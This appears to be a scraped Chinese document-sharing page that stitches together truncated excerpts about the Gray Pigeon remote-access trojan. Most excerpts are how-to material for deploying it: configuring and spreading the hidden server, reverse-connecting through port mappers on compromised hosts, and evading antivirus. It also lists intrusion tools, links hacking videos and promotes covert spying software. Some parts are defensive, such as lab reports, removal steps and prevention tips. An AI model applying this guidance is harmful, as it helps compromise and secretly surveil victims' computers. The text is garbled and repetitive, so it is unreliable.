灰鸽子使用教程图解 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program

式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。

4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。

关于灰鸽子的原理以及制作和清理

“灰鸽子”攻击原理以及制作和清理 院别计算机科学与通信工程学院专业计算机科学与技术 班级学号4090511 姓名唐盼 指导教师曲荣欣 成绩 2012年 6 月7 日

“灰鸽子”攻击原理以及制作和清理 一.灰鸽子简介: “灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位. 而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词. 二,灰鸽子基本原理: “灰鸽子”客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。

如何使用灰鸽子软件

灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以 上的端口来完成! 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读 取系统设定的代理服务器信息,无需用户设置! 3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专 用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都 可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性 !同时具用牵手版的搜索符合条件主机的功能: a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了! 5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、 上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性. 6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制! 7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表 显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息, 9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机 有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第 三方软件支持!支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具: a. EXE工具: 可以修改任何EXE文件图标,支持真彩色! b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使 你在局域网内部也能使用自动上线功能! c. FTP服务器: 可以开本机FTP服务! d. Web服务器: 可以建立一个简单的Web服务器! 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用

很有价值的黑客教程

有4-5个它说有非法字符像08 05 07 12 你们只要把中间的空格删了就能上了在网上找到个FTP ftp://ftp.crazystudy.:2129/ ftp://ftp2.crazystudy.:2129/里面有教程 微软金牌讲师讲解组策略(视频教程)免费下载 .jinghuazhan./jianzhan/84/749.html 爱国者黑鹰一日一动画08年所有(更新至4.20)免费下载 .jinghuazhan./jianzhan/85/748.html 黑客动画吧最新教程5-25 的教程 .jinghuazhan./jianzhan/85/747.html 华夏黑客联盟2008年大型VIP培训黑客技术系列教程 .jinghuazhan./jianzhan/85/745.html 微软windows2008官方教学视频 .jinghuazhan./jianzhan/85/746.html 黑客防线c语言编程黑客特训班(全) .jinghuazhan./jianzhan/85/743.html 黑客基地Delphi vip教程(25课全)免费高速下载 .jinghuazhan./jianzhan/85/744.html 电脑E书大全,各种计算机技术书籍,电子书免费下载 .jinghuazhan./jianzhan/84/734.html 〖红娘工作室〗木马VIP免杀培训区视频教程15课免费下载 .jinghuazhan./jianzhan/85/742.html 黑客基地VIP教程1-104课免费高速下载 .jinghuazhan./jianzhan/85/741.html 华夏黑客同盟vip教程入侵和个人电脑收集 .jinghuazhan./jianzhan/85/598.html 黑客山庄基础脱壳免费教程 .jinghuazhan./jianzhan/85/596.html PYG 原创破解入门教程,破解基础讲解,暴破实例<精装友情通讯录> .jinghuazhan./jianzhan/85/593.html 黑客VIP特训班教程系列,DELPHI,黑客基地C语言等教程 .jinghuazhan./jianzhan/85/592.html (黑软VIP)黑白网络收费教程全集下载,黑吧.黑鹰.网安vip教程,黑鹰入侵VI .jinghuazhan./jianzhan/85/518.html 第一课: HTML语言之页面标记 .hxhack./bbs/hxjc/200801jc/2008010101.rar 第二课: HTML语言之字体标记 .hxhack./bbs/hxjc/200801jc/2008010102.rar 第三课: HTML语言之文字布局标记 .hxhack./bbs/hxjc/200801jc/2008010103.rar

灰鸽子上线详细教程

Gray pigeons -- 灰鸽子是什么呢? 灰鸽子简单的说它是远程监控软件,(黑客类),当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分:客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端(简称:免杀),免杀的话那就是杀毒软件查不到那是一个木马程序! 鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响!(其他的我也说不清楚)如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。(如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用) 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻(前提是需要控制到宽带上网用户) 个人对鸽子的认识我对它的了解也不是全面的(现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧!) ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧! 灰鸽子下载:https://www.doczj.com/doc/b814869735.html,/file/t06ef189fa(不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜)

常用黑客工具(网络入侵工具)

常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制

灰鸽子内网上线教程

序: 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。(8000端口是灰鸽子的默认端口,这个端口是可以更改的) 要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多,设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。 正文: 第一步: 把vidc的服务端vidcs传到公网的机子上,肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图:

冰刃使用教程

冰刃使用教程(顽固文件杀灭工具-冰刃Icesword) p.s. 具体可参见下面的参考资料,带图,附中文版下载 这是一斩断黑手的利刃,它适用于Windows 2000/XP/2003 操作系统,其 内部功能是十分强大,用于查探系统中的幕后黑手-木马后门,并作出处理。可 能您也用过很多类似功能的软件,比如一些进程工具、端口工具,但是现在的 系统级后门功能越来越强,一般都可轻而易举地隐藏进程、端口、注册表、文 件信息,一般的工具根本无法发现这些“幕后黑手”。IceSword 使用了大量新颖 的内核技术,使得这些后门躲无所躲。使用前请详细阅读说明。第一次使用请 保存好数据,需要您自己承担可能的风险,特别是多处理器机器的朋友,谢谢. 增加使用教程,帮助更多需要帮助的人 lceSword冰刃(以下简称IceSword)是一款斩断系统黑手的绿色软件。在笔者的 使用中,IceSword表现很令笔者满意,绝对是一把强悍的瑞士军刀——小巧、 强大。 1.IceSword的“防” 打开软件,看出什么没?有经验的用户就会发现,这把冰刃可谓独特,它显示在系统任务栏或软件标题栏的都只是一串随机字串“CE318C”,而并是通常所见的软件程序名(见图1)。这就是IceSword独有的随机字串标题栏,用户每次打开这把冰刃,所出现的字串都是随机生成,随机出现,都不相同(随机五位/六位字串),这样很多通过标题栏来关闭程序的木马和 后门在它面前都无功而返了。另外,你可以试着将软件的文件名改一下,比如 改为 killvir.exe,那么显示出来的进程名就变为了killvir.exe。现在你再试着关 闭一下IceSword,是不是会弹出确认窗口?这样那些木马或后门就算通过鼠标 或键盘钩子控制窗口退出按钮,也不能结束IceSword的运行了,只能在IceSword的面前乖乖就范了。 点击在新窗口中浏览图片 图1 2.IceSword的“攻” 推荐以后用火狐上网,火狐可以保障你上网的安全,可以 放心浏览,可以屏蔽病毒和木马 火狐浏览器在线更新可防止最近最流行的木马及病毒变种.

怎样使用灰鸽子

怎样使用灰鸽子 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program

式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。

4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。

灰鸽子内网各种方法

其实问题主要是网络的结构问题的理解上面了 灰鸽子(服务端)要求你的条件是对方(控制端)的ip (你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的: 外网的ip是怎么样的? 要求不是192.168.x.x开头, 10.10.x.x也不行, 这两种ip是校园网等的内网常用的ip 通常你们在网吧是不可能令到灰鸽子上线的, 一般来说只有是家庭的adsl才有可能是公网的了。 (一般来说其它的可能都是不多的,例如: 一些校园网内部的服务器,他们的ip是公网的,是不同的) 你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的,虽然他们说的是可行的, 但是他们不说实现的条件. 但是事实上你们没有这样的条件的! 至于申请域名的事情是对于你自己的ip来说的。(我一会儿具体补充) 但是要明白对方(控制端)的ip也是内网的话,你是没有办法的。 比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50 这个221.4.188.50是几十人到几百人在用的, 是用到nat技术的网络(至于什么是nat,我不说了啦,你们去网上查查把)。 你永远也不可能直接连接到我的,(直接?) 你要连接到我只有一种可能:(间接连接:中间通过一个外网的服务器,下面的讲解联系到灰鸽子自带的端口映射工具。方法:生成映射服务端,放到他们学校的服务器。不一定要控制他们学校的服务器。上线地址填被你控制机器的IP。) 就是你控制了我们学校的一些服务器:ip是202.192.240.0 这个网络的电脑是公网的.你就可以通过他连接到我 而且还要我告诉你我的ip是什么才行啊. 因为你永远也不知道我的内网ip是什么. 除非你控制了我们的路由器. 至于对方的ip是192.168.x.x这个也是一样的原理. 你永远不会连接到它,除非....(我上面说了拉) 至于自动上线的条件麻,就是多了一个: (其实自动上线的话,是令到你的肉鸡直接连接到你(你的ip)!!! 什么?你的ip会变化的?这时候就用到域名了。域名跟ip是一样的(你可以这样理解),只不过域名固定了。 其实用不用ftp空间都是一样的,如果你的机器ip是符合下面的条件的话,你直接可以用你的机器建立ftp, 如果不符合下面的条件的话,ftp空间是没有用的,肉鸡永远都不会找到你,还说什么连接呢。 这里顺便说一下很多教程在配置:(在配置服务端的时候) “(ip通知)dns解析域名,固定ip,网页文件”的配置

电脑某按键失灵或者连电解决办法汇总

不是硬件问题的话,有可能你机中了病毒,名"灰鸽子".(灰鸽子木马分两部分:客户端和服务端。首先你不急重启电脑或重装系统.因为这样有可能下次开机时你无法进入WINDOWS或造成文件丢失.首先得备份好重要文件,然后再重装系统. 或可以直接除掉"灰鸽子" 清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件近来“灰鸽子病毒”传播的甚是厉害,5Q上有不少人以发布卡巴斯基杀毒软件为名,在其中暗藏病毒,尤其以自解压包的文件最为危险,其病毒程序在自解压后能够自动运行,并在生成木马程序后自动删除源文件!而灰鸽子病毒的作者至今还没有停止对灰鸽子的开发,再加上有部分人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。现在即使是最新版本的杀毒软件也未必可以完全进行查杀,可能在正常杀毒下显示已完全清除,但可能在你重新启动后,木马程序再次生成!!!在这里结合本人的实际经验给出一个“灰鸽子病毒”手动清除的办法!灰鸽子的运行原理灰鸽子木马分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成一个服务端程序。服务端文件的名字默认为 G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载…… 由于灰鸽子病毒变种繁多,其文件名也很多变,近来发现的以 (Backdoor.GPigeon.sgr类型居多,不易对付,在被感染的系统%Windows%目录下生成三个病毒文件,分别是 G_Server.exe,G_Server.dll,G_Server_Hook.dll。 G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt 目录,然后再从体内释放 G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和 G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。同时注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。 Windows 目

灰鸽子远程控制木马教程

一定要用迅雷下,不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/hideadmin1.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/hideadmin2.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/CHM1.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/BEAST1.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/BEAST2.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/BEAST3.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/VMware1.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/VMware2.wmv https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.doczj.com/doc/b814869735.html,/eschool/esafe2/Iris01.wmv

灰鸽子木马利用与防护

任务名称:灰鸽子木马利用与防护 任务目的与要求: 了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击。本次任务要求学生学习灰鸽子木马远程控制软件的使用,通过实验可以了解木马和计算机病毒的区别,熟悉使用木马进行网络攻击的原理和方法。 实验任务涉及到的相关知识: 任务环境拓扑: 具体步骤: 1.登录windows2003,打开灰鸽子软件。 winxp windows2003

2.灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端,点击“确定” 3.登录到XP系统。点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。

4.返回win2003,点击“文件”-“增加主机”,输入XP的IP地址192.168.0.43(以在XP下通过ipconfig命令查看到得IP为准),点击确定。 5.双击文件目录浏览下的“我的电脑”,可以查看到主机为192.168.0.43的标识。然后双击192.168.0.43,可以查看到XP系统的目录及文件。此时点击C:\Documents and Settings\Administrator\桌面,可以查看到XP左面上放置的文件setup.exe服务器端。

木马防护方法

防治方法 现在我们来说防范木马的方法之一,就是把 windows\system\mshta.exe文件改名, 改成什么自己随便 (xp和win2000是在system32下) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD 类型的键Compatibility,并设定键值为0x00000400即可。 还有windows\command\debug.exe和windows\ftp.exe都给改个名字(或者删除) 一些最新流行的木马最有效果的防御~~ 比如网络上流行的木马smss.exe这个是其中一种木马的主体潜伏 在 98/winme/xp c:\windows目录下 2000 c:\winnt ..... 假如你中了这个木马首先我们用进程管理器结束正在运行的木马smss.exe 然后在C:\windows 或 c:\winnt\目录下创建一个假的 smss.exe 并设置为只读属性~ (2000/XP NTFS的磁盘格式的话那就更好 可以用“安全设置” 设置为读取)这样木马没了~ 以后也不会在感染了这个办法本人测试过对很多木马都很有效果的 经过这样的修改后,我现在专门找别人发的木马网址去测试,实验结果是上了大概20个木马网站,有大概15个瑞星会报警,另外5个瑞星没有反映,而我的机器没有添加出来新的EXE文件,也没有新的进程出现,只不过有些木马的残骸留在了IE的临时文件夹里,他们没有被执行起来,没有危险性,所以建议大家经常清理临时文件夹和IE 随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。 防治木马的危害,应该采取以下措施: 第一,安装杀毒软件和个人防火墙,并及时升级。 第二,把个人防火墙设置好安全等级,防止未知程序向外传送数据。 第三,可以考虑使用安全性比较好的浏览器和电子邮件客户端工具。 第四,如果使用IE浏览器,应该安装卡卡安全助手或360安全浏览器,防止恶意网站在自己电脑上安装不明软件和浏览器插件,以免被木马趁机侵入。 远程控制的木马有:冰河,灰鸽子,上兴,PCshare,网络神偷,FLUX 等,现在通过线程插入技术的木马也有很多.现在的木马程序常常和和DLL 文件息息相关,被很多人称之为“DLL木马”。DLL木马的最高境界是线程

实验2--灰鸽子

电子信息工程学系实验报告——适用于计算机课程 课程名称:信息安全概论Array实验项目名称:灰鸽子的使用实验时间:2012.4.27 班级:信息安全101 姓名:徐凤姬学号:020708119 一、实验目的: 1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。 2、通过实验了解灰鸽子是一款优秀的远程控制软件。 3、熟悉使用木马进行网络攻击的原理和方法。 二、实验环境: 装有Windows 2000/XP系统的计算机,局域网或Internet,灰鸽子软件(服务器和客户端)。 三、实验原理 功能介绍: (1)对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。 (2)远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!(3)捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能! (4)视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话! (5)telnet(超级终端). (6)注册表模拟器:远程注册表操作就像操作本地注册表一样方便。 (7)命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页, 筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作。 (8)服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器。 (9)专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线。(10)多种自动上线方式:专用上线、DNS解析域名、固定IP等,由用户自由选择。 四、实验内容 熟悉灰鸽子的使用,例如:窃取账号、密码、照片、重要文件,连续捕获远程电脑屏幕,监控被控电脑上的摄像头,或者进行远程控制。 五、实验步骤 1、在做灰鸽子实验前,先关闭杀毒软件和防火墙。 2、安装灰鸽子 (1)将下载的文件解压到某个文件夹,但不要改文件夹的名字。 (2)首先运行 sunray.exe,然后运行 http.exe 点开始服务。 (3)运行客户端,也就是H_Client.exe这个文件,点击“自动上线”选项。 3、远程控制灰鸽子的应用 (1)打开灰鸽子,主页面如下:

相关主题
相关文档 最新文档